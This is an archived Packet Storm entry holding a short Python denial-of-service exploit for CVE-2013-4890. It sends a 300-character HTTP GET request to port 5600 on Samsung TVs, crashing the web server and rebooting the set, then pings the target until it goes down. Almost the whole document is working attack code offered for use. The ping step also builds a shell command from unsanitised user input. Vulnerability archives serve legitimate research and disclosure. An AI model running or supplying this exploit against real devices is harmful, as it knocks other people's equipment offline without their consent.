Lucene search

K
packetstormMalik MesselemPACKETSTORM:122502
HistoryJul 22, 2013 - 12:00 a.m.

Samsung TV Denial Of Service

2013-07-2200:00:00
Malik Messelem
packetstormsecurity.com
19

0.13 Low

EPSS

Percentile

95.5%

`#!/usr/bin/python  
  
# Exploit Title: Samsung TV Denial of Service (DoS) Attack  
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com  
# Date: 07/21/2013  
# CVE Number: CVE-2013-4890  
# Vendor Homepage: http://www.samsung.com  
# Description:  
# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request  
# As a results, the TV reboots...  
# Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)  
  
import httplib  
import sys  
import os  
  
print " ***************************************************************************************"  
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"  
print " Exploit: Denial of Service (DoS) attack\n"  
print " Description:\n"  
print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."  
print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"  
print " ***************************************************************************************\n"  
  
# Sends the payload  
print " Sending the malicious payload...\n"  
conn = httplib.HTTPConnection(sys.argv[1],5600)  
conn.request("GET", "A"*300)  
conn.close()  
  
# Checks the response  
print " Checking the status... (CTRL+Z to stop)\n"  
response = 0  
while response == 0:  
response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")  
if response != 0:  
print " Target down!\n"  
  
  
`